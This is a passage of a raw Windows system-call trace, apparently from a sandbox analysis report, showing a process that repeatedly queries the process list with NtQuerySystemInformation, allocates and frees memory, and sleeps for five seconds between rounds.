BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.638] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 